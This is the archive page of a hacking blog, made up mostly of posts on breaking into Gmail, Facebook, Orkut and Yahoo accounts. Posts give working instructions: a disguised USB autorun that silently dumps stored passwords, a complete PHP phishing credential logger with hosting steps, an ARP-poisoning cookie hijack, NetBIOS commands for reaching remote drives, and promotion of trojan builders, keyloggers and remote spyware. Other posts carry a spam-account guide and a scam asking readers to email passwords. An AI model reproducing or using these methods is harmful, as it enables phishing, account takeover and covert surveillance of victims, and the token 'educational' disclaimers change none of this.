Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


Showing posts with label Gmail. Show all posts
Showing posts with label Gmail. Show all posts

EASY TO MAKE SPAM MAIL

We certainly annoyed when receiving junk email (spam) repeatedly to our inbox mail. In addition, spam emails often inserted by destructive virus. Now! To create spam mail is very easy. Less than 5 minutes, we've been able to send spam emails without worrying about our identity will be detected. (Remember!!. This tutorial is only for education).

We need the help of Mail Creator. This software will help us to create many email addresses. Amazingly, creating this email is without any verification process. So, the owner of the email will be difficult to be identified.

Once the download is complete, install on the computer and follow these steps:

1. On the display screen of Mail creator, remove the check mark in the "Random PWS"

2. Write the number of emails that you want to create in the "How Many" box, then press Create button Mails "

3. After generating process is complete, you will see the email that You make with @usa.net vendor

4. Click the check box between the list of email addresses and passwords

5. Then, save the email address to the computer by pressing the Save UserNs button.

6. Visit Netaddress to start using email. Enter your account one hat you created and fill in the correct password.

You already have a spam email account and you can start sending email to the destination address. To get very much email addresses, you can also pass up on facebook or mailing list.

Top 20 Google Hints(Hacks)



Here is a list of my favorite Google advanced search operators, operator combinations, and related uses:
  • link:URL = lists other pages that link to the URL.
  • related:URL = lists other pages that are related to the URL.
  • site:domain.com “search term = restricts search results to the given domain.
  • allinurl:WORDS = shows only pages with all search terms in the url.
  • inurl:WORD = like allinurl: but filters the URL based on the first term only.
  • allintitle:WORD = shows only results with terms in title.
  • intitle:WORD = similar to allintitle, but only for the next word.
  • cache:URL = will show the Google cached version of the URL.
  • info:URL = will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.
  • filetype:SOMEFILETYPE = will restrict searches to that filetype
  • -filetype:SOMEFILETYPE = will remove that file type from the search.
  • site:www.somesite.net “+www.somesite.net” = shows you how many pages of your site are indexed by google
  • allintext: = searches only within text of pages, but not in the links or page title
  • allinlinks: = searches only within links, not text or title
  • WordA OR WordB = search for either the word A or B
  • “Word” OR “Phrase” = search exact word or phrase
  • WordA -WordB = find word A but filter results that include word B
  • WordA +WordB = results much contain both word A and word B
  • ~WORD = looks up the word and its synonyms
  • ~WORD -WORD = looks up only the synonyms to the word

Best And Popular Trick To Hack Passwords


Here is a small trick with which you can sniff passwords stored in a computer.To do so you need some Utilities…..
MessenPass,PasswordFox,Protected Passview,IE Passview,Mail passview..

Description

MessenPass:
MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:
  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP/Vista/7)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby
MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs.
PasswordFox
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser.
Protected Passview
Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.
IE Passview
IE PassView is a small password management utility that reveals the passwords stored by Internet Explorer Web browser, and allows you to delete passwords that you don’t need anymore. It supports all versions of Internet Explorer, from version 4.0 and up to 8.0.
Mail passview
Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:
  • Outlook Express
  • Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
  • Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP and SMTP Accounts)
  • Windows Mail
  • Windows Live Mail
  • IncrediMail
  • Eudora
  • Netscape 6.x/7.x (If the password is not encrypted with master password)
  • Mozilla Thunderbird (If the password is not encrypted with master password)
  • Group Mail Free
  • Yahoo! Mail – If the password is saved in Yahoo! Messenger application.
  • Hotmail/MSN mail – If the password is saved in MSN/Windows/Live Messenger application.
  • Gmail – If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
HOW TO DO IT>>
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP, Vista and Windows 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]


gmail logo stylized 300x300 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
Hi Hackers,
THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.
This is a very awesome app and a great trick to hack someone’s gmail account – Gmail Hacker.!
This Gmail hacker is one of my favorite software to hack Gmail password. The only thing you have to do is to build your own Gmail Hacker and send this Gmail hacker to the victim. I’ve provided the link below for the download:

Gmail Hacker – Software to hack Gmail password :

1. First ensure that you have installed Microsoft .Net Framework. If not, then you can download it from here: Download .Net Framework
2. Click HERE to download Gmail Hacker.
3. Download Winrar extract Gmail hacker folder.(with winrar)
4. Now, run Gmail Hacker Builder.exe file on your computer to see :
4115378636 7a99b4ff35 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
5. Enter in your email address and password (** I RECOMMEND CREATING A FAKE ID AND ENTER THE DETAILS OF THAT FAKE ID ONLY** So that people should not have a fear of losing their real email IDs in a doubt about this application icon smile How To Hack Gmail Password Using Gmail Hacker [TUTORIAL] ) and hit on Build. Then Gmail hacker builder will create your own Gmail hacker application – Gmail Hacker.exe file which you can use to hack gmail password.
6. Now, send this Gmail Hacker.exe file to victim  and tell him that this Gmail hacker is used to hack Gmail password. Ask him to run Gmail Hacker.exe and enter all information (which includes his Gmail id and password plus Gmail ID of the victim he wanna hack).
4115378760 a2e79f5773 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
7. As he enters the information and hits “Hack Them”, he will receive an error message as shown below:
4115386436 1acebf90b6 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
7. In return, you will receive an email in your email account like this:
4115378704 c7b005c3e8 How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
9. You’re Done!! icon biggrin How To Hack Gmail Password Using Gmail Hacker [TUTORIAL] You got his Gmail ID n password!

The best way to Hack Gmail Password is by using the Sniper Spy remote spy software:

Sniper Spy How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]
HAPPY HACKING!! icon smile How To Hack Gmail Password Using Gmail Hacker [TUTORIAL]

How To Hack Gmail account using GX Cookie


3581374939 3be31f5a59 Hacking Gmail account using GX Cookie 
Disclaimer: This post is only for educational purpose.
Introduction
Hacking web application was always curious for the script kiddies. And hacking free web email account is every geek first attempt. The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.
The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting) discussed by other is earlier post. But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.
Assumption:
  • You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.
  • You know basic networking.
Tool used for this attack:
  • Cain & Abel
  • Network Miner
  • Firefox web browser with Cookie Editor add-ons
Attack in detail:
We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.
We will go step by step,
If you are using Wireless network then you can skip this Step A.
A] Using Cain to do ARP poisoning and routing:
Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).
  • Start Cain from Start > Program > Cain > Cain
  • Click on Start/Stop Sniffer tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.
  • Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select
All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.
How to check your physical IP ?
> Click on start > Run type cmd and press enter, in the command prompt type
Ipconfig and enter. This should show your IP address assign to your PC.
It will have following outputs:
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : xyz.com
IP Address. . . . . . . . . . . . : 192.168.1.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Main thing to know here is your IP address and your Default Gateway.
Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.
  • Click on Configure > APR > Use Spoofed IP and MAC Address > IP
Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.
  • Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.
The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.
  • Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.
B] Using Network Miner to capture cookie in plain text
We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.
We are using This tool because of its ease to use.
  • Open Network Miner by clicking its exe (pls note it requires .Net framework to work).
  • From the “—Select network adaptor in the list—“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.
Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.
  • Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.
  • Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon
Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv
Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.
C] Using Firefox & cookie Editor to replay attack.
  • Open Firefox and log in your gmail email account.
  • from firefox click on Tools > cookie Editor.
  • In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.
  • From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.
  • Sorry! You can’t change password with cookie attack.
How to be saved from this kind of attack?
Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.
Settings > Browser connection > Always use https

How to make phishing pages for gmail,orkut,facebook

I don't know how many of you are aware of phishing attacks,Anyway keep in mind that, it is the most common and easiest way to hack anyones personal details.In this article Iam going to share some ideas about Phishing and will show you how to make your own Phishing pages for various sites like gmail or orkut.For making Phishing page for any site you need 3 types of files in common.They are

1) .Html file ( ie fake page )

2) .php file or any other action script page ( for tracking the details that  entered in page created by you )

3) .Txt file ( To save all the details in text format )


In common,every phishing page contains these 3 files,But normally you can see only the fake page which looks exactly as original,remaining files will run in background that will not be visible for you.Here I am going to create a phishing page for gmail login.Procedures for creating phishing pages for all sites are same.I am giving you detailed instructions for making this page,Just follow my steps exactly as i mentioned.

STEPS FOR CREATING PHISHING PAGE.

1 ) First goto Gmail login page ( www.gmail.com,make sure that the page is loaded completely ) and right click and select view source ( in firefox ) or view source code option in other browsers.

2 ) Select all ( CTR + A ) and copy all the code and paste it in notepad.

3 ) Then search for the keyword action.You can see the code as given below.





4 ) Just change the above code as mentioned below






after changing to mail.php ( or anyname.php ) just save it in the form login.html ( anyname.html ). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.


5 ) For creating a php script,just copy the below php code into notepad and save in the format mail.php (  name mentioned in action of our phishing page )

<?php
header ('Location: http://www.gmail.com ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

6 ) By this step our PHP script is also ready,Now create a .Txt file with name log.txt ( name mentioned in php script )

7 ) Now host these 3 files ie,
login.html

mail.php

log.txt

in any of free hosting servers like ripway,drivehq,100 mb etc (or any other,just google free hosting ).Make sure that these 3 files are in same directory.

8 ) After hosting you will get a direct link to your phishing page,that is to your login.html page.just use this link to access or send phishing page.


HOW PHISHING IS WORKING

When you enter your username and password in gnail login phishing page and click singin or hit enter the mail.php script is loaded and this will copy all the entered details in to your log.txt file.Since we are given www.gmail.com as the header location original gmail page will be loaded after the php script.So the victim will think that they entered wrong information.If victim is already logged in gmail,then their mail will be loaded.


You can also read this HOW TO CREATE PHISHING PAGES FOR FACEBOOK

NOTE : This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes.www.thehackerclub4u.tk will not be responsible for any such phishing attacks,KNOW HACKING BUT NO HACKING....

If you found anything useful in this article please pass your comments,All your feedbacks are precious...............

How To Hack Siri To Use Twitter, Facebook Or Google+



How To Hack Siri To Use Twitter, Facebook Or Google+
Siri’s an amazing advancement in the way that we interact with out iPhones, but it doesn’t exactly do everything you want it to do out of the box. In fact, three conspicuous abilities absent from Siri’s feature set include the ability to make a Facebook status update, send a message to Google+ or even tweet… doubly absurd given iOS 5”s native Twitter integration.
Don’t worry, though. It’s easy enough to hack any iPhone 4S to Tweet, Facebook or Google+ through Siri. Here’s how.

Techland gives us a great run down of easy Siri hacks that will get you up and running with voice control Twitter, Facebook and Google+ in no time:
For Facebook, text “Hello” to 32665 in the United States (or the short code for whatever country you’re in), then follow the link in the reply to finish the setup process. Add the short code to your Contacts, and name it “Facebook.” That way, you can tell Siri to “send a text to Facebook saying …”
For Twitter, text “START” to 40404 in the United States (or the short code for other countries), then respond with your username, then your password. Add the short code to your Contacts with the name “Twitter.”
For Google+, visit your settings page and scroll down to “Set delivery preferences.” Add your cell phone number, but be sure to click “don’t notify me” if you don’t want incoming Google+ messages by text. Verify your number with the code you receive by phone, then add the short code “33669” (in the U.S.) to your contacts as “Google Plus.” Updates are shared with everyone in your circles.

6 ways on How to hack orkut account

Most of people are curious to know on How to hack orkut account,due to rise in number of hackers,orkut security has became a challenging question for the security experts,my purpose of this post is not to teach you hacking but to make you aware of the hackers,Below are some of the methods written through which a hacker can hack an orkut account







                                
How to hack orkut account-methods


1.Orkut Phishing:
As i have stated in all articles, Phishing is first priority to hack Orkut passwords. Infact, it is most favorite method of orkut hackers. Here, you have to send a fake orkut login page (orkut phisher) to orkut friend and ask him to login to orkut account by this fake orkut login phisher. This orkut phisher is, ofcourse, prepared by you. When orkut friend logs in to orkut account by this orkut phisher, his orkut password is emailed to you and thus you can now hack his orkut account. I have added a post on Hack orkut using fake login page


2.Keylogging :
This is most easy way to hack orkut password. Here, you have to install keylogger software on victim computer and give destination at which keylogger will send all passwords typed on friend's computer. And then keylogger will start recording all keystrokes on victim computer and send these passwords. This keylogging becomes more easy if you have physical access to victim computer. Even, remote keylogger installation can be done. i have a made a post on Which spyware keylogger softwares to choose the following post will tell you about the best best keyloggers availible now days.


3.Community links :
Many times, you are provided with community links in orkut scraps inviting you to join it. On clicking the link in orkut scrap, you are directed to orkut phisher explained above, ready to hack orkut account profile .I have made a post to Hacking orkut through community links,


4. Orkut Javascript hack :
This method became much famous in last year. Here, orkut victim is provided with some javascript (popularly called code) and is asked to copy paste this javascript code in his address bar for say changing his orkut theme. When victim does this, his orkut cookies are stolen and now orkut hacker has hacked his orkut profile using cookies. I have written more on orkut cookie stealing in Hack Orkut account account by Cookie stealing.


5. Link manipulating:
  • Link Manipulation : Link manipulation is one kind of hacking trick wherehackers fool people with identical domain names. By an email or scrap or message, they send you a link. Once you enter your ID and password in those pages, be sure that your profile is gone for ever. That link will be 90% identical with Orkut. Here are few of them.
  • www.orukt.com
    www.community-orkut.com
    www.orkut-login.com
    while the original Orkut domain is www.orkut.com


6. Primary email address hack
If orkut hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this orkut hacker can easily hack your orkut account using "Forgot password" trick. He will simply ask orkut to send password reset email to your primary email address- which is already hacked. Thus, your orkut account password will be reset and orkut account hacked !!!


So, always remember to protect your orkut primary email address and try to keep unknown or useless mail id as your primary email address

How to hack a runescape account

if u want to hack a runescape
account send to
hackerclub4u@gmail.com
subject:
password recovery

(yourusername)

(VictimsUsername)

(yourpassword)


then send it

they will give you the password 5 to 10 min

How to Protect an Email Account from being Hacked



Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is: “Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.
 
If this is the case, then what is the reason for many people to lose their accounts?
The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who lose their email accounts are not the victims of hacking but the victims of Trapping. They lose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.
Are you confused? If so continue reading and you’ll come to know…
Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.
 
1. WEBSITE SPOOFING
Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.
For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.
 
Solution:
  • Never try to login/access your email account from the sites other than the original site.
  • Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.
 
2. BY USING KEYLOGGERS
The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.
 
Solution:
Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.
 
3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES
Do you access your email from cyber cafes?  Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.
This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.
So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked. Please pass your comments…

Netbios Hacking

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.
STEP-BY-STEP NETBIOS HACKING PROCEDURE
1.Open command prompt
2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
Example: C:\>net view \\219.64.55.112
The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.
3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint
 
NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.
NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.
4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.
NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.
HAPPY NETBOS HACKING!!

Downright now - Monitoring if your favorite website is down

Last night when I was at Facebook, suddenly it stopped responding and the server requests just timed out.Downright now - Monitoring if your favorite website is down - theprohack.com I wondered if it was a problem with my ISP or the king of social networking was down at the moment. With nothing to do, I googled and stumbled across Downrightnow , a service that monitors your favorite websites. It compiles the status by combining
  • Reports from users who visit downrightnow
  • Public messages on Twitter from users who are having service trouble
  • Official company announcements and status reports
  • Other third-party web sites that monitor service status
Downright now - Monitoring if your favorite website is down - theprohack.com
As soon as I opened the website, I came to know that Facebook was having some problems at that time
Yep..Facebook was down - theprohack.com
Mission Successful :P I guess you will find it interesting.

Remote password hacking software - sniperspy

Spy on a pc
Are you looking for the Best Remote password hacking software? Do you need to spy on your remote computer without the need for physical access? But wait! Before you go for any remote spy software you should read our shocking reviews!

1. Sniper Spy (Remote Install Supported)


Editors Rating: 8/10


Remote password hacking softwareSniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.
Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s!  This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!
Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel!
This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!

remote password hacking software


remote password hacking software

SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes
remote password spying software

4. Records any Password (Email, Login, Instant Messenger etc.)

5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall

What if i dont have physical acess to victims computer?


remote password hacking software
 No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.

This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.

The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.

Why would I need SniperSpy?

Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can't get to your computer and are worried about the Internet safety or habits of those using it, then you NEED SniperSpy.

This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).

                                Sniperspy No 1 PC Spy software

4 ways on How to hack facebook password

 
 In my previous post How to hack facebook password i told you about hacking facebook with phishing,Today i thought to uncover all the methods used to hack facebook password,

I will cover 4 methods over here:

1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack

Facebook phishing:

I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article How to hack facebook password

Keylogging:


This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password. I have posted detailed information of top keyloggers in the trade for more information see my password hacking softwares section

3. Social engineering:

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


4.Primary email address hack
So far, i found these Facebook hacking methods as best and working ways to hack facebook account passwords. I never encourage hacking Facebook or any email account,,I just wanna make you aware about Facebook dangers online. I will appreciate your effort if you mention any other Facebook hacking method. 

5. Facebook Cookie Stealing 

I am updating this post with a new method which is being used to hack facebook accounts, which I think is very effective, Facebook cookie stealing is becoming popular day by day.The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:Read More

Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;
 

Hack Yahoo Password

 
This advanced program will help you to hack yahoo password of any account. All you need to know is their email address and you’ll be able to gain access to the users account. This program is to be used to recover and change your own facebook accounts password, to help a friend recover theirs with their permission, or for parents to keep an eye on their children’s accounts. If you use the hack yahoo password program for any purposes besides this, you are responsible for your own actions.



With that being said, the program hack yahoo password is fairly simple to use. In the first text box you will insert the email address for the account or if you’re unable to figure that out, you can input the profile id which is usually like a 9 digit number sequence but can often be word or words set by the profile owner. You can find this number by looking at the URL when you visit the program.

After you’ve got the first text box filled, set the password in the next two boxes. I’m well aware that you could simply use the program again in order to change the password if you didn’t input it correctly; however, to make it a more practical program you’ll need to verify that you typed it correctly. Finally, hit the "change" button. This will begin the process of logging you in and changing the password. When it has completed the task, you will be notified with a message box informing you it has completed and that you can now log in.

Use the hack yahoo password program responsibly. You are responsible for your own actions. Don’t go around causing too much trouble at your school, work, or household.

Download



Download it here!

Hack Friendster Password

 
